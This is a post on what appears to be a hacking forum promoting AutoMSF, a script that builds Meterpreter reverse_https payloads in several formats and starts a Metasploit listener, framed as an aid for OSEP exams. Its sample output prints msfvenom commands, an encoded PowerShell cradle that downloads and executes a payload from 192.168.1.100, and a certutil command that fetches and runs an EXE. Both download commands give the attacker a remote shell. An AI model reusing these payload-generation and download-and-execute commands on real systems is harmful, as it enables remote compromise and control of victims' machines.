dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,860
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,546
- Points
- 1,813
- Credits
- 55,340
7 Years of Service
56%
AutoMSF is a Python script designed for fast generation and deployment of multiple types of Meterpreter reverse_https payloads. Created to aid in OSEP challenges and exams, it generates C#, EXE, VBS, and PS1 payloads, prepares obfuscated PowerShell commands for execution, and sets up a Metasploit listener for incoming connections.
Features
- Self-contained - All functionality consolidated in a single Python script
- Multiple payload formats - Generate EXE, PowerShell, VBA, C#, HTA, and more
- Command line utility - Easy to use with multiple command line options
- Network interface detection - Automatic IP detection for common interfaces
- Obfuscation options - Random filename generation
- Web hosting - Payloads automatically copied to web server
- Execution commands - Ready-to-use download and execution commands
- Cross-platform compatibility - Works on Linux, macOS, and Windows (with WSL)
- Metasploit integration - Automatic handler generation
Bash:
█████╗ ██╗ ██╗████████╗ ██████╗ ███╗ ███╗███████╗███████╗
██╔══██╗██║ ██║╚══██╔══╝██╔═══██╗████╗ ████║██╔════╝██╔════╝
███████║██║ ██║ ██║ ██║ ██║██╔████╔██║███████╗█████╗
██╔══██║██║ ██║ ██║ ██║ ██║██║╚██╔╝██║╚════██║██╔══╝
██║ ██║╚██████╔╝ ██║ ╚██████╔╝██║ ╚═╝ ██║███████║██║
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝
v2.0
Created by: Ivan Spiridonov (xbz0n)
Website: https://xbz0n.sh
[*] Current Time: 2023-09-28 15:43:21
[*] Platform: Linux 5.15.0-kali3-amd64
[*] Python Version: 3.10.9
======================================================================
[*] Checking dependencies...
[+] Metasploit Framework found
[+] Apache web server is running
[+] Web directory exists
[*] Using LHOST=192.168.1.100, LPORT=4444
[*] Generating windows/x64/meterpreter/reverse_https payloads...
[*] Executing: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f exe -o ./payloads/payload_exe.exe
[+] Generated ./payloads/payload_exe.exe
[+] Copied ./payloads/payload_exe.exe to web server directory
[*] Executing: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f psh -o ./payloads/payload_psh.ps1
[+] Generated ./payloads/payload_psh.ps1
[+] Copied ./payloads/payload_psh.ps1 to web server directory
[+] Created Metasploit handler script: ./payloads/handler.rc
[*] Download and execution commands:
PS1 (payload_psh.ps1):
powershell -nop -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwADAALwBwAGEAeQBsAG8AYQBkAF8AcABzAGgALgBwAHMAMQAnACkA
EXE (certutil):
certutil -urlcache -split -f http://192.168.1.100/payload_exe.exe %TEMP%\payload_exe.exe && %TEMP%\payload_exe.exe
[*] Start the Metasploit handler with:
msfconsole -q -r ./payloads/handler.rc
Download
To see this hidden content, you must like this content.